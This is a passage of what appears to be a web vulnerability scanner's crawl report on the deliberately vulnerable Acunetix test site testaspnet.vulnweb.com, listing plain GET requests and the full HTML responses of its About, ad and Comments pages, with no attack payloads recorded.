style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/about.aspx
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 322 bytes.	GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14619
Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ads/def.html
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 363 bytes.	GET http://testaspnet.vulnweb.com/ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 246 bytes.	HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Fri, 24 May 2019 07:50:37 GMT Accept-Ranges: bytes ETag: "eb6cf45f512d51:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 488
Response Body - size: 488 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title></title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1"> <meta name="ProgId" content="VisualStudio.HTML"> <meta name="Originator" content="Microsoft Visual Studio .NET 7.1"> </head> <body> <P align="center"><STRONG>Is your website hackable?<BR> check with<BR> <IMG src="acunetix.gif"><BR> Web Vulnerability Scanner</STRONG></P> </body> </html>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13859
Response Body - size: 13,859 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKDytHbBQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a 